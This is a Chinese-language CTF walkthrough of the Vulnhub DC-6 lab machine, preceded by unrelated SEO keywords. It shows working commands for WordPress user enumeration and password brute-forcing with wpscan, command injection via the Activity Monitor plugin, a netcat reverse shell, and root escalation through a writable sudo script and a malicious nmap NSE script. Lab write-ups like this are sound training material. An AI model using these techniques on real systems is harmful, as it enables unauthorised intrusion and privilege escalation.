做视频怎么去除网站,做网站怎么存放视频,网站权重有时降,自己做的网站怎么维护靶机IP:192.168.20.140 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)
信息收集
nmap扫描靶机端口及版本信息 dirsearch扫目录 发现是个wordpress建站 我们去访问前端界面 存在重定向#xff0c;修改hosts文件#xff0c;加入192.168…靶机IP:192.168.20.140 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)
信息收集
nmap扫描靶机端口及版本信息 dirsearch扫目录 发现是个wordpress建站 我们去访问前端界面 存在重定向修改hosts文件加入192.168.20.140 wordy
漏洞利用
与DC-2都是用的wordpress建站同样考虑用wpscan扫描网站漏洞。 wpscan --url http://wordy --enumerate u爆破用户名 把用户名存成字典ueser.txt 之后根据vulnhubDC-6首页作者的提示生成字典。
┌──(root㉿kali)-[/home/kali/Desktop/DC-6]
└─# cat /home/kali/Desktop/jwt/rockyou.txt | grep k01 pass.txt用wpscan爆破用户有了用户名字典和密码字典 wpscan --url http://wordy -U user.txt -P pass.txt 通过/wp-admin路径登入后台浏览功能发现一个Activity Monitor功能里面的tools可以执行命令用ping 127.0.0.1 | ls进行测试发现存在命令注入 用nc反弹shell 之后生成交互式shell
提权
查看SUID提权没有发现提权点。 之后浏览目录在passwd中发现四个用户 接下来去他们目录看下在jens中发现个thing-to-do.txtcat一下发现graham的密码 尝试连接
$ su graham
su graham
Password: GSo7isUM1D4grahamdc-6:/home$ ls之后看下sudo提权发现jens目录下的脚本文件可以执行
grahamdc-6:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.sh再看下文件权限我们的用户graham正好在devs用户组有rwx权限
grahamdc-6:/home/jens$ ls -l
ls -l
total 12524
-rwxrwxr-x 1 jens devs 58 Jun 11 22:40 backups.sh
-rw-r--r-- 1 jens jens 12819077 Jun 11 22:19 backups.tar.gz
grahamdc-6:/home/jens$ id
id
uid1001(graham) gid1001(graham) groups1001(graham),1005(devs)
grahamdc-6:/home/jens$我们在脚本中写入bash
grahamdc-6:/home/jens$ echo /bin/sh /home/jens/backups.sh
echo /bin/sh /home/jens/backups.sh之后执行切换到用户jens
grahamdc-6:/home/jens$ sudo -u jens /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
tar: Removing leading / from member names
$ whoami
whoami
jens查看sudo提权
$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap看下nmap sudo提权 7.40 这个靶机nmap版本是7.40不是b的老版本所以用a #.nse是nmap的插件拓展名
$ echo os.execute(/bin/sh) /tmp/pass.nse
echo os.execute(/bin/sh) /tmp/pass.nse
$ sudo nmap --script/tmp/pass.nse
sudo nmap --script/tmp/pass.nseStarting Nmap 7.40 ( https://nmap.org ) at 2024-06-11 22:57 AEST
# whoami
root
# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
# cat /root/theflag.txtYb dP 888888 88 88 8888b. dPYb 88b 88 888888 d8b Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P YbdPYbdP 88 88 .o 88 .o 8I dY Yb dP 88 Y88 88 YP YP 888888 88ood8 88ood8 8888Y YbodP 88 Y8 888888 (8) Congratulations!!!Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via DCAU7.
提权成功find命令找打flagcat一下
